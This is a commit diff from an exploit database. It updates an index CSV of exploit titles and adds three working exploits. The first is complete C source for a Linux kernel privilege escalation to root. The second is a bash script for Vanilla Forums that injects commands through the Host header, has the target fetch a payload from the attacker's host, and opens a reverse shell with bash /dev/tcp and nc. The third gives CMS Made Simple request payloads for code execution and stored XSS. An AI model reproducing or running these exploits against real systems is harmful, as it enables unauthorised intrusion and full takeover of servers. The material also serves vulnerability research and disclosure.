DB: 2017-05-13

3 new exploits

Cerberus FTP Server 1.x - Buffer Overflow Denial of Service
Palo Alto Networks PanOS root_trace - Privilege Escalation
Palo Alto Networks PanOS - root_reboot Privilege Escalation
Palo Alto Networks PanOS - 'root_trace' Privilege Escalation
Palo Alto Networks PanOS - 'root_reboot' Privilege Escalation

Linux Kernel 4.8.0 - Packet Socket Local root Privilege Escalation
Linux Kernel 4.8.0 (Ubuntu) - Packet Socket Local Privilege Escalation
Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' & 'SO_RCVBUFFORCE' Local Privilege Escalation

Microsoft IIS WebDav - ScStoragePathFromUrl Overflow (Metasploit)
Microsoft IIS - WebDav 'ScStoragePathFromUrl' Overflow (Metasploit)
Vanilla Forums < 2.3 - Remote Code Execution

N-able N-central - Cross-Site Request Forgery

CMS Made Simple 2.1.6 - Multiple Vulnerabilities

files.csv

@@ -2549,7 +2549,7 @@ id,file,description,date,author,platform,type,port
 20955,platforms/windows/dos/20955.pl,"Internet Download Manager - Memory Corruption",2012-08-31,Dark-Puzzle,windows,dos,0
 20922,platforms/osx/dos/20922.txt,"Rumpus FTP Server 1.3.x/2.0.3 - Stack Overflow Denial of Service",2001-06-12,"Jass Seljamaa",osx,dos,0
 20930,platforms/windows/dos/20930.c,"Microsoft Index Server 2.0 / Indexing Service (Windows 2000) - ISAPI Extension Buffer Overflow (PoC)",2001-06-18,Ps0,windows,dos,0
-20946,platforms/windows/dos/20946.txt,"Cerberus FTP Server 1.x - Buffer Overflow Denial of Service",2001-06-21,"Cartel Informatique Security Research Labs",windows,dos,0
+20946,platforms/windows/dos/20946.txt,"Cerberus FTP Server 1.x - Buffer Overflow Denial of Service",2001-06-21,Cartel,windows,dos,0
 20949,platforms/windows/dos/20949.c,"1C: Arcadia Internet Store 1.0 - Denial of Service",2001-06-21,"NERF Security",windows,dos,0
 20952,platforms/linux/dos/20952.c,"eXtremail 1.x/2.1 - Remote Format String (1)",2001-06-21,"Luca Ercoli",linux,dos,0
 20957,platforms/windows/dos/20957.pl,"WarFTP Daemon 1.82 RC 11 - Remote Format String",2012-08-31,coolkaveh,windows,dos,0
@@ -8863,8 +8863,8 @@ id,file,description,date,author,platform,type,port
 40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0
 40741,platforms/windows/local/40741.py,"Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution",2016-11-08,R-73eN,windows,local,0
 40765,platforms/windows/local/40765.cs,"Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0
-40788,platforms/linux/local/40788.txt,"Palo Alto Networks PanOS root_trace - Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0
+40788,platforms/linux/local/40788.txt,"Palo Alto Networks PanOS - 'root_trace' Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0
-40789,platforms/linux/local/40789.txt,"Palo Alto Networks PanOS - root_reboot Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0
+40789,platforms/linux/local/40789.txt,"Palo Alto Networks PanOS - 'root_reboot' Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0
 40807,platforms/windows/local/40807.txt,"Huawei UTPS - Unquoted Service Path Privilege Escalation",2016-11-22,"Dhruv Shah",windows,local,0
 40810,platforms/linux/local/40810.c,"Linux Kernel 2.6.18 - 'move_pages()' Information Leak",2010-02-08,spender,linux,local,0
 40811,platforms/lin_x86-64/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,lin_x86-64,local,0
@@ -8979,7 +8979,8 @@ id,file,description,date,author,platform,type,port
 41959,platforms/windows/local/41959.txt,"Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation",2017-05-03,LiquidWorm,windows,local,0
 41972,platforms/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",windows,local,0
 41973,platforms/linux/local/41973.txt,"Xen 64bit PV Guest - pagetable use-after-type-change Breakout",2017-05-08,"Google Security Research",linux,local,0
-41994,platforms/linux/local/41994.c,"Linux Kernel 4.8.0 - Packet Socket Local root Privilege Escalation",2017-05-11,"Andrey Konovalov",linux,local,0
+41994,platforms/linux/local/41994.c,"Linux Kernel 4.8.0 (Ubuntu) - Packet Socket Local Privilege Escalation",2017-05-11,"Andrey Konovalov",linux,local,0
+41995,platforms/linux/local/41995.c,"Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' & 'SO_RCVBUFFORCE' Local Privilege Escalation",2017-02-22,"Andrey Konovalov",linux,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15498,7 +15499,8 @@ id,file,description,date,author,platform,type,port
 41975,platforms/windows/remote/41975.txt,"Microsoft Security Essentials / SCEP (Microsoft Windows 8/8.1/10 / Windows Server) - 'MsMpEng' Remotely Exploitable Type Confusion",2017-05-09,"Google Security Research",windows,remote,0
 41978,platforms/multiple/remote/41978.py,"Oracle GoldenGate 12.1.2.0.0 - Unauthenticated Remote Code Execution",2017-05-09,"Silent Signal",multiple,remote,0
 41980,platforms/python/remote/41980.rb,"Crypttech CryptoLog - Remote Code Execution (Metasploit)",2017-05-09,Metasploit,python,remote,80
-41992,platforms/windows/remote/41992.rb,"Microsoft IIS WebDav - ScStoragePathFromUrl Overflow (Metasploit)",2017-05-11,Metasploit,windows,remote,0
+41992,platforms/windows/remote/41992.rb,"Microsoft IIS - WebDav 'ScStoragePathFromUrl' Overflow (Metasploit)",2017-05-11,Metasploit,windows,remote,0
+41996,platforms/php/remote/41996.sh,"Vanilla Forums < 2.3 - Remote Code Execution",2017-05-11,"Dawid Golunski",php,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -36101,7 +36103,7 @@ id,file,description,date,author,platform,type,port
 38127,platforms/php/webapps/38127.php,"PHP 5.5.9 - cgimode fpm writeprocmemfile Bypass disable function",2015-09-10,ylbhz,php,webapps,0
 38128,platforms/cgi/webapps/38128.txt,"Synology Video Station 1.5-0757 - Multiple Vulnerabilities",2015-09-10,"Han Sahin",cgi,webapps,5000
 38129,platforms/php/webapps/38129.txt,"Octogate UTM 3.0.12 - Admin Interface Directory Traversal",2015-09-10,"Oliver Karow",php,webapps,0
-38130,platforms/java/webapps/38130.txt,"N-able N-central - Cross-Site Request Forgery",2012-12-13,"Cartel Informatique Security Research Labs",java,webapps,0
+38130,platforms/java/webapps/38130.txt,"N-able N-central - Cross-Site Request Forgery",2012-12-13,Cartel,java,webapps,0
 38131,platforms/php/webapps/38131.txt,"PHP Address Book - 'group' Parameter Cross-Site Scripting",2012-12-13,"Kenneth F. Belva",php,webapps,0
 38133,platforms/php/webapps/38133.txt,"WordPress Plugin RokBox Plugin - /wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf abouttext Parameter Cross-Site Scripting",2012-12-17,MustLive,php,webapps,0
 38134,platforms/php/webapps/38134.txt,"Joomla! Component 'com_ztautolink' - 'Controller' Parameter Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0
@@ -37838,3 +37840,4 @@ id,file,description,date,author,platform,type,port
 41988,platforms/php/webapps/41988.txt,"QNAP PhotoStation 5.2.4 / MusicStation 4.8.4 - Authentication Bypass",2017-05-10,"Kacper Szurek",php,webapps,8080
 41989,platforms/php/webapps/41989.txt,"BanManager WebUI 1.5.8 - PHP Code Injection",2017-05-10,HaHwul,php,webapps,0
 41990,platforms/php/webapps/41990.html,"Gongwalker API Manager 1.1 - Cross-Site Request Forgery",2017-05-10,HaHwul,php,webapps,0
+41997,platforms/php/webapps/41997.txt,"CMS Made Simple 2.1.6 - Multiple Vulnerabilities",2017-05-10,"Osanda Malith",php,webapps,0

platforms/linux/local/41995.c

@@ -0,0 +1,176 @@
+// CAP_NET_ADMIN -> root LPE exploit for CVE-2016-9793
+// No KASLR, SMEP or SMAP bypass included
+// Affected kernels: 3.11 -> 4.8
+// Tested in QEMU only
+// https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
+//
+// Usage:
+// # gcc -pthread exploit.c -o exploit
+// # chown guest:guest exploit
+// # setcap cap_net_admin+ep ./exploit
+// # su guest
+// $ whoami
+// guest
+// $ ./exploit
+// [.] userspace payload mmapped at 0xfffff000
+// [.] overwriting thread started
+// [.] sockets opened
+// [.] sock->sk_sndbuf set to fffffe00
+// [.] writing to socket
+// [+] got r00t
+// # whoami
+// root
+//
+// Andrey Konovalov <andreyknvl@gmail.com>
+
+#define _GNU_SOURCE
+
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <sys/mman.h>
+
+#include <pthread.h>
+#include <signal.h>
+#include <stdarg.h>
+#include <stddef.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+#define COMMIT_CREDS 0xffffffff81079860ul
+#define PREPARE_KERNEL_CRED 0xffffffff81079b20ul
+
+typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
+typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
+
+_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;
+_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;
+
+void get_root(void) {
+ 	commit_creds(prepare_kernel_cred(0));
+}
+
+struct ubuf_info_t {
+  uint64_t callback;        // void (*callback)(struct ubuf_info *, bool)
+  uint64_t ctx;             // void *
+  uint64_t desc;            // unsigned long
+};
+
+struct skb_shared_info_t {
+  uint8_t  nr_frags;        // unsigned char
+  uint8_t  tx_flags;        // __u8
+  uint16_t gso_size;        // unsigned short
+  uint16_t gso_segs;        // unsigned short
+  uint16_t gso_type;        // unsigned short
+  uint64_t frag_list;       // struct sk_buff *
+  uint64_t hwtstamps;       // struct skb_shared_hwtstamps
+  uint32_t tskey;           // u32
+  uint32_t ip6_frag_id;     // __be32
+  uint32_t dataref;         // atomic_t
+  uint64_t destructor_arg;  // void *
+  uint8_t  frags[16][17];   // skb_frag_t frags[MAX_SKB_FRAGS];
+};
+
+// sk_sndbuf = 0xffffff00 => skb_shinfo(skb) = 0x00000000fffffed0
+#define SNDBUF 0xffffff00
+#define SHINFO 0x00000000fffffed0ul
+
+struct ubuf_info_t ubuf_info = {(uint64_t)&get_root, 0, 0};
+//struct ubuf_info_t ubuf_info = {0xffffdeaddeadbeeful, 0, 0};
+struct skb_shared_info_t *skb_shared_info = (struct skb_shared_info_t *)SHINFO;
+
+#define SKBTX_DEV_ZEROCOPY (1 << 3)
+
+void* skb_thr(void* arg) {
+	while (1) {
+		skb_shared_info->destructor_arg = (uint64_t)&ubuf_info;
+		skb_shared_info->tx_flags |= SKBTX_DEV_ZEROCOPY;
+	}
+}
+
+int sockets[2];
+
+void *write_thr(void *arg) {
+	// Write blocks until setsockopt(SO_SNDBUF).
+	write(sockets[1], "\x5c", 1);
+
+	if (getuid() == 0) {
+		printf("[+] got r00t\n");
+		execl("/bin/bash", "bash", NULL);
+		perror("execl()");
+	}
+	printf("[-] something went wrong\n");
+}
+
+int main() {
+	void *addr;
+	int rv;
+	uint32_t sndbuf;
+
+	addr = mmap((void *)(SHINFO & 0xfffffffffffff000ul), 0x1000ul,
+		PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE,
+		-1, 0);
+	if (addr != (void *)(SHINFO & 0xfffffffffffff000ul)) {
+		perror("mmap()");
+		exit(EXIT_FAILURE);
+	}
+
+	printf("[.] userspace payload mmapped at %p\n", addr);
+
+ 	pthread_t skb_th;
+    	rv = pthread_create(&skb_th, 0, skb_thr, NULL);
+	if (rv != 0) {
+		perror("pthread_create()");
+		exit(EXIT_FAILURE);
+	}
+    	usleep(10000);
+
+	printf("[.] overwriting thread started\n");
+
+	rv = socketpair(AF_LOCAL, SOCK_STREAM, 0, &sockets[0]);
+	if (rv != 0) {
+		perror("socketpair()");
+		exit(EXIT_FAILURE);
+	}
+
+	printf("[.] sockets opened\n");
+
+	sndbuf = SNDBUF;
+	rv = setsockopt(sockets[1], SOL_SOCKET, SO_SNDBUFFORCE,
+			&sndbuf, sizeof(sndbuf));
+	if (rv != 0) {
+		perror("setsockopt()");
+		exit(EXIT_FAILURE);
+	}
+
+	printf("[.] sock->sk_sndbuf set to %x\n", SNDBUF * 2);
+
+	pthread_t write_th;
+	rv = pthread_create(&write_th, 0, write_thr, NULL);
+	if (rv != 0) {
+		perror("pthread_create()");
+		exit(EXIT_FAILURE);
+	}
+	usleep(10000);
+
+	printf("[.] writing to socket\n");
+
+	// Wake up blocked write.
+	rv = setsockopt(sockets[1], SOL_SOCKET, SO_SNDBUF,
+			&sndbuf, sizeof(sndbuf));
+	if (rv != 0) {
+		perror("setsockopt()");
+		exit(EXIT_FAILURE);
+	}
+	usleep(10000);
+
+	close(sockets[0]);
+	close(sockets[1]);
+
+	return 0;
+}

platforms/php/remote/41996.sh

@@ -0,0 +1,211 @@
+#!/bin/bash
+# 
+#      __                     __   __  __           __                 
+#     / /   ___  ____ _____ _/ /  / / / /___ ______/ /_____  __________
+#    / /   / _ \/ __ `/ __ `/ /  / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
+#   / /___/  __/ /_/ / /_/ / /  / __  / /_/ / /__/ ,< /  __/ /  (__  ) 
+#  /_____/\___/\__, /\__,_/_/  /_/ /_/\__,_/\___/_/|_|\___/_/  /____/  
+#            /____/                                                   
+# 
+#
+# Vanilla Forums <= 2.3   Remote Code Execution (RCE) PoC Exploit 0day
+# Core version (no plugins, default config.)
+#
+# CVE-2016-10033 (RCE)
+# CVE-2016-10073 (Header Injection)
+#
+# vanilla-forums-rce-exploit.sh (ver. 1.0)
+#
+#
+# Discovered and coded by 
+#
+# Dawid Golunski
+# https://legalhackers.com
+# https://twitter.com/dawid_golunski
+# 
+# ExploitBox project:
+# https://ExploitBox.io
+#
+#
+# Exploit code:
+# https://exploitbox.io/exploit/vanilla-forums-rce-exploit.sh
+#
+# Full advisory URL:
+# https://exploitbox.io/vuln/Vanilla-Forums-Exploit-RCE-0day-Remote-Code-Exec-CVE-2016-10033.html
+#
+# Related advisories:
+# https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
+# https://exploitbox.io/vuln/Vanilla-Forums-Exploit-Host-Header-Injection-CVE-2016-10073-0day.html
+#
+# White-paper 'Pwning PHP mail() function For Fun And RCE'
+# https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html
+#
+#
+# Usage:
+# ./vanilla-forums-rce-exploit.sh target-forum-url reverse_shell_ip
+#
+# Tested on:
+# Vanilla Core 2.3
+# https://open.vanillaforums.com/addon/vanilla-core-2.3
+#
+# Disclaimer:
+# For testing purposes only
+#
+#
+# -----------------------------------------------------------------
+#
+# Interested in vulnerabilities/exploitation? 
+#
+# 
+#                        .;lc'                          
+#                    .,cdkkOOOko;.                      
+#                 .,lxxkkkkOOOO000Ol'                   
+#             .':oxxxxxkkkkOOOO0000KK0x:'               
+#          .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.           
+#       ':oxxxxxxxxxxo;.       .:oOKKKXXXNNNNOl.        
+#      '';ldxxxxxdc,.              ,oOXXXNNNXd;,.       
+#     .ddc;,,:c;.         ,c:         .cxxc:;:ox:       
+#     .dxxxxo,     .,   ,kMMM0:.  .,     .lxxxxx:       
+#     .dxxxxxc     lW. oMMMMMMMK  d0     .xxxxxx:       
+#     .dxxxxxc     .0k.,KWMMMWNo :X:     .xxxxxx:       
+#     .dxxxxxc      .xN0xxxxxxxkXK,      .xxxxxx:       
+#     .dxxxxxc    lddOMMMMWd0MMMMKddd.   .xxxxxx:       
+#     .dxxxxxc      .cNMMMN.oMMMMx'      .xxxxxx:       
+#     .dxxxxxc     lKo;dNMN.oMM0;:Ok.    'xxxxxx:       
+#     .dxxxxxc    ;Mc   .lx.:o,    Kl    'xxxxxx:       
+#     .dxxxxxdl;. .,               .. .;cdxxxxxx:       
+#     .dxxxxxxxxxdc,.              'cdkkxxxxxxxx:       
+#      .':oxxxxxxxxxdl;.       .;lxkkkkkxxxxdc,.        
+#          .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.            
+#             .':oxxxxxxxxx.ckkkkkkkkxl,.               
+#                 .,cdxxxxx.ckkkkkxc.                   
+#                    .':odx.ckxl,.                      
+#                        .,.'.      
+#
+# Subscribe at:
+#
+# https://ExploitBox.io
+#
+# https://twitter.com/Exploit_Box
+#
+# -----------------------------------------------------------------
+
+intro="
+DQobWzBtIBtbMjFDG1sxOzM0bSAgICAuO2xjJw0KG1swbSAbWzIxQxtbMTszNG0uLGNka2tPT09r
+bzsuDQobWzBtICAgX19fX19fXxtbOEMbWzE7MzRtLiwgG1swbV9fX19fX19fG1s1Q19fX19fX19f
+G1s2Q19fX19fX18NCiAgIFwgIF9fXy9fIF9fX18gG1sxOzM0bScbWzBtX19fXBtbNkMvX19fX19c
+G1s2Q19fX19fX19cXyAgIF8vXw0KICAgLyAgXy8gICBcXCAgIFwvICAgLyAgIF9fLxtbNUMvLyAg
+IHwgIFxfX19fXy8vG1s3Q1wNCiAgL19fX19fX19fXz4+G1s2QzwgX18vICAvICAgIC8tXCBfX19f
+IC8bWzVDXCBfX19fX19fLw0KIBtbMTFDPF9fXy9cX19fPiAgICAvX19fX19fX18vICAgIC9fX19f
+X19fPg0KIBtbNkMbWzE7MzRtLmRkYzssLDpjOy4bWzlDG1swbSxjOhtbOUMbWzM0bS5jeHhjOjs6
+b3g6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eG8sG1s1QxtbMG0uLCAgICxrTU1NMDouICAuLBtb
+NUMbWzM0bS5seHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1QxtbMG1sVy4gb01N
+TU1NTU1LICBkMBtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1
+QxtbMG0uMGsuLEtXTU1NV05vIDpYOhtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDLhtbMTsz
+NG1keHh4eHhjG1s2QxtbMG0ueE4weHh4eHh4eGtYSywbWzZDG1szNG0ueHh4eHh4Og0KG1szN20g
+G1s2Qy4bWzE7MzRtZHh4eHh4YyAgICAbWzBtbGRkT01NTU1XZDBNTU1NS2RkZC4gICAbWzM0bS54
+eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s2QxtbMG0uY05NTU1OLm9NTU1NeCcb
+WzZDG1szNG0ueHh4eHh4Og0KG1szN20gG1s2QxtbMTszNG0uZHh4eHh4YxtbNUMbWzBtbEtvO2RO
+TU4ub01NMDs6T2suICAgIBtbMzRtJ3h4eHh4eDoNChtbMzdtIBtbNkMbWzE7MzRtLmR4eHh4eGMg
+ICAgG1swbTtNYyAgIC5seC46bywgICAgS2wgICAgG1szNG0neHh4eHh4Og0KG1szN20gG1s2Qxtb
+MTszNG0uZHh4eHh4ZGw7LiAuLBtbMTVDG1swOzM0bS4uIC47Y2R4eHh4eHg6DQobWzM3bSAbWzZD
+G1sxOzM0bS5keHh4eCAbWzBtX19fX19fX18bWzEwQ19fX18gIF9fX19fIBtbMzRteHh4eHg6DQob
+WzM3bSAbWzdDG1sxOzM0bS4nOm94IBtbMG1cG1s2Qy9fIF9fX19fX19fXCAgIFwvICAgIC8gG1sz
+NG14eGMsLg0KG1szN20gG1sxMUMbWzE7MzRtLiAbWzBtLxtbNUMvICBcXBtbOEM+G1s3QzwgIBtb
+MzRteCwNChtbMzdtIBtbMTJDLxtbMTBDLyAgIHwgICAvICAgL1wgICAgXA0KIBtbMTJDXF9fX19f
+X19fXzxfX19fX19fPF9fX18+IFxfX19fPg0KIBtbMjFDG1sxOzM0bS4nOm9keC4bWzA7MzRtY2t4
+bCwuDQobWzM3bSAbWzI1QxtbMTszNG0uLC4bWzA7MzRtJy4NChtbMzdtIA0K"
+
+
+function prep_host_header() {
+        cmd="$1"
+        rce_cmd="\${run{$cmd}}";
+
+        # replace / with ${substr{0}{1}{$spool_directory}}
+        #sed 's^/^${substr{0}{1}{$spool_directory}}^g'
+        rce_cmd="`echo $rce_cmd | sed 's^/^\${substr{0}{1}{\$spool_directory}}^g'`"
+
+        # replace ' ' (space) with 
+        #sed 's^ ^${substr{10}{1}{$tod_log}}$^g'
+        rce_cmd="`echo $rce_cmd | sed 's^ ^\${substr{10}{1}{\$tod_log}}^g'`"
+        #return "target(any -froot@localhost -be $rce_cmd null)"
+        host_header="target(any -froot@localhost -be $rce_cmd null)"
+        return 0
+}
+
+
+echo "$intro"  | base64 -d
+
+if [ "$#" -ne 2 ]; then
+	echo -e "Usage:\n$0 target-forum-url reverse_shell_ip\n"
+	exit 1
+fi
+target="$1"
+rev_host="$2"
+
+
+echo -e '                   \e[44m| ExploitBox.io |\e[0m'
+echo -e "
+\e[94m+ --=|\e[0m \e[91m  Vanilla Forums <= 2.3 Unauth. RCE Exploit \e[0m  \e[94m|\e[0m"
+#sleep 1s
+echo -e "\e[94m+ --=|\e[0m                                               \e[94m|\e[0m
+\e[94m+ --=|\e[0m           Discovered & Coded By               \e[94m|\e[0m
+\e[94m+ --=|\e[0m               \033[94mDawid Golunski\033[0m                  \e[94m|\e[0m 
+\e[94m+ --=|\e[0m         \033[94mhttps://legalhackers.com\033[0m              \e[94m|\e[0m 
+\e[94m+ --=|\e[0m               \033[94m@dawid_golunski\033[0m                 \e[94m|\e[0m 
+\e[94m+ --=|\e[0m                                               \e[94m|\e[0m
+\e[94m+ --=|\e[0m \"With Great Power Comes Great Responsibility\" \e[94m|\e[0m 
+\e[94m+ --=|\e[0m        \e[91m*\e[0m For testing purposes only \e[91m*\e[0m          \e[94m|\e[0m 
+
+"
+
+echo -ne "\e[91m[*]\033[0m"
+read -p " Sure you want to get a shell on the target '$target' ? [y/N] " choice
+echo
+if [ "$choice" == "y" ]; then 
+	
+	echo -e "\e[92m[*]\033[0m Guess I can't argue with that... Let's get started...\n"
+	#sleep 2s
+	#sleep 2s
+
+	# Host payload on :80
+	RCE_exec_cmd="(sleep 5s && nohup bash -i >/dev/tcp/$rev_host/1337 0<&1 2>&1) &"
+	echo "$RCE_exec_cmd" > rce.txt
+	python -mSimpleHTTPServer 80 2>/dev/null >&2 &
+	hpid=$!
+
+	# POST data string
+	data='hpt=&Target=discussions&Email=admin&Request+a+new+password=Request+a+new+password&DeliveryType=VIEW&DeliveryMethod=JSON'
+
+	# Save payload on the target in /tmp/rce
+	cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
+	prep_host_header "$cmd"
+	curl -H"Host: $host_header" -0 -s -i -d "$data" $target/entry/passwordrequest | grep -q "200 OK"
+	if [ $? -ne 0 ]; then
+		echo "[!] Failed conecting to the target URL. Exiting"
+		exit 2
+	fi
+	echo -e "\e[92m[+]\033[0m Connected to the target"
+	echo -e "\n\e[92m[+]\e[0m Payload sent successfully"
+	sleep 2s
+
+	# Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
+	cmd="/usr/bin/nohup /bin/bash /tmp/rce"
+	prep_host_header "$cmd"
+	#echo -e "Host Payload2: \nHost: $host_header"
+	curl -H"Host: $host_header" -s -0 -i -d "$data" $target/entry/passwordrequest >/dev/null 2>&1 &
+	echo -e "\n\e[92m[+]\033[0m Payload executed!"
+
+	echo -e "\n\e[92m[*]\033[0m Waiting for the target to send us a \e[94mreverse shell\e[0m...\n"
+	nc -vv -l 1337
+	#killall python
+	echo
+else 
+	echo -e "\e[92m[+]\033[0m Responsible choice ;) Exiting.\n"
+	exit 0
+
+fi
+	#kill -9 $hpid
+
+echo "Exiting..."
+exit 0

platforms/php/webapps/41997.txt

@@ -0,0 +1,30 @@
+# Title:             CMSMS 2.1.6 Multiple Vulnerabilities
+# Date:              10-05-2017
+# Tested on:         Windows 8 64-bit
+# Exploit Author:    Osanda Malith Jayathissa (@OsandaMalith)
+# Original write-up: https://osandamalith.com/2017/05/11/cmsms-2-1-6-multiple-vulnerabilities/
+# CVE: CVE-2017-8912
+
+Remote Code Execution
+======================
+
+POST /cmsms/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4 HTTP/1.1
+
+_sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru('dir')%3B&description=&run=1&apply=1&ajax=1 
+
+
+Stored XSS 
+==========
+
+POST /cmsms/admin/addgroup.php HTTP/1.1
+
+_sk_=92a32a8aaa87e958&group=%3Csvg%2Fonload%3Dalert%282%29%3E&description=%22%3E%3Csvg%2Fonload%3Dalert%283%29%3E&active=on&addgroup=true
+
+
+Disclosure Timeline
+====================
+
+09-05-2017: Reported to the vendor
+09-05-2017: Vendor doesn't accept XSS issues inside admin panel and claimed the RCE as a feature, not a bug :)
+10-05-2017: Public disclosure
+11-05-2017: Assigned CVE-2017-8912